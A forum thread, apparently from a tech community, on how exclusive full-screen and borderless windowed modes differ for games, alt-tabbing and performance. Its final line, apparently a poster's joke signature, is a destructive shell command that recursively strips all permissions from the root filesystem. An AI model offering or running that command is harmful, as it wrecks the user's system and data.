Difference between Full-Screen and Borderless(Full Screen Window)

Go to solution Solved by clementk,

Is there a difference? I like to use borderless so I can alt-tab out of games faster, but not having the green check mark in GeForce experience is annoying me.(They recommend full-screen)

when you run applications in full screen mode they run in "exclusive mode" That means it has full and direct control over the screen output.

where windowed has to go though something like explorer so it can be slowed down

Please remember to follow your topics ;)

The difference is that when you alt-tab the game is treated like any other window, however the window border is removed. You may loose a little performance from this, but nothing significant.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
